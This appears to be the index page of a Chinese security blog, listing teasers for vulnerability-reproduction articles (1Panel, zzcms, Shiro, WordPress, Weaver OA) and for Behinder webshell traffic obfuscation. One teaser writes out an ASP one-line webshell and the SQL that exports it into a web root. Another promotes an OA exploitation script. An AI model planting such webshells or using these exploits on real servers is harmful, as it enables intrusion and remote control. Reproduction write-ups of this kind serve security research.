欢迎关注公众号《TEST安全》,定时更新安全相关内容

搜索内容

安卓APP抓包解决方案

泛微OA漏洞综合利用脚本

Joomla(CVE-2023-23752)漏洞复现

最新文章
移动安全
OA漏洞复现
编程相关

  • 置顶安卓APP抓包解决方案(教程)

    环境准备 kali windows burpsuite 夜神模拟器 Android7.0以上 版本V7.0.2.2000 Charles postern 工具简介 Charles 下载地址 Charle……

    漏洞空间 2022-12-28
    0 2

  • 置顶泛微OA漏洞综合利用脚本

    集合漏洞 泛微云桥任意文件读取 泛微OA V8前台Sql注入 泛微OA WorkflowServiceXml RCE CNVD-2019-32204 泛微OA weaver.common.Ctrl 任意文件上传 泛微OA Bsh RCE 泛微OA WorkflowCenterTreeData接……

    漏洞空间 2022-12-23
    0 0

  • 1Panel服务器管理控制面板SQL注入CVE-2024-39907漏洞复现

    1Panel服务器管理控制面板SQL注入CVE-2024-39907漏洞复现       1Panel 是一款基于 Web 的 Linux 服务器管理控制面板。项目中存在大量 SQL 注入,部分注入过滤不善,导致任意文件写入,最终导致 RCE。这些 SQ……

    漏洞空间 2024-07-25
    0 0

  • 统信安装wine9.1支持exe64位运行环境

    安装命令如下: git clone https://gitee.com/winehq/wine.git git checkout wine-9.1   安装依赖 sudo apt install libwayland-dev sudo apt install libpcsclite-dev sudo apt install libsane-dev sudo……

    漏洞空间 2024-05-31
    0 1

  • sqlmap在匿名管道中报using ‘STDIN’ for parsing targets list

    如图所示:  解决:通过跟踪断点信息,发现有个config的参数conf.stdinPipe的值和直接在shell中执行命令行的值不一致,所以在sqlmap的源码的lib/core/option.py 中的init()方法中设置conf.stdinPipe=None后解决了……

    漏洞空间 2024-04-28
    0 0

  • IDEA2020.2版本启动一个WEB服务

    IDEA2020.2版本启动一个WEB服务 1、创建一个新项目 1、点击文件>新建>项目 选择Empty Project,然后点击下一步 然后点击下一步 点击在新窗口打开   在弹出来的框(文件>项目结构)>模块>添……

    漏洞空间 2024-03-11
    0 0

  • CVE-2020-19961(zzcms存在sql注入漏洞)

    zz cms 2019 subzs.php 存在sql注入漏洞 文件对应路径:  zs/subzs.php 注入漏洞存在位置: 在showcookiezs函数中,第十六行sql语句将cookie中接收的zzcmscpid没闭合直接拼接 查找调用showcookiezs的函数,在fix函……

    漏洞空间 2024-01-23
    0 0

  • shiro漏洞复现(CVE-2016-4437)

    1、Shiro反序列化漏洞(CVE-2016-4437,Shiro-550) 漏洞原理: shiro框架在登录时,如果勾选了RememberMe的功能,关闭浏览器再次访问时便无需再次登录,此时cookie中会增加一个rememberMe字段,其 value 的值是……

    漏洞空间 2024-01-23
    0 0

  • CVE-2023-2982漏洞复现 WordPress 社交登录和注册插件(Discord、Google、Twitter、LinkedIn)<= 7.6.4 - 身份验证绕过

    CVE-2023-2982WordPress 社交登录和注册插件(Discord、Google、Twitter、LinkedIn)<= 7.6.4 - 身份验证绕过漏洞复现 WordPress的社交登录和注册(Discord、Google、Twitter、LinkedIn)插件在7.6.4之前(含7.……

    漏洞空间 2023-11-25
    0 0

  • access数据库导出数据表内容到根目录

    创建表a1字段b create table a1(b text) 像表a1字段b里面写入数据 insert into a1 (b) values('<%execute request(1)%>') 把写入的数据导出到D:\web\11.asp SELECT b into [<%execute request(1)%>] i……

    漏洞空间 2023-11-24
    0 0

  • docker安装SonarQube代码质量评估

    docker安装SonarQube代码质量评估,SonarQube无法启动解决方案 1、第一处修改 在物理机(VPS)内输入如下命令: vi /etc/sysctl.conf 添加如下内容:   vm.max_map_count = 262144 fs.file-max = 65536 &nb……

    漏洞空间 2023-11-07
    0 0

  • 冰蝎4.0流量分析及魔改

    冰蝎4.0流量分析及魔改 0x00 前言 冰蝎v4.0开放了传输协议的自定义功能,使得流量魔改更为简单方便,本文以jsp脚本类型为例,提供一些冰蝎4流量魔改的方式 0x01传输协议分析 冰蝎4内置了如下几种传输协议,传输协……

    漏洞空间 2023-08-19
    0 0

搜索

扫码关注《TEST安全》公众号

接受最新安全信息

近期文章

最新评论

  • 漏洞空间
    6月4日

    你好,编译好的解压密码是xsssql

    评论于 Weblogic远程代码执行CVE-2023-21839/CNVD-2023-04389漏洞复现

  • 漏洞空间
    3月15日

    你好,编译好的解压密码是xsssql

    评论于 Weblogic远程代码执行CVE-2023-21839/CNVD-2023-04389漏洞复现

  • zero
    3月15日

    大佬,编译好的POC 解压密码是什么?

    评论于 Weblogic远程代码执行CVE-2023-21839/CNVD-2023-04389漏洞复现

    • 友情链接
    申请友链
    好玩的游戏復刻錶易语言源码网水木易学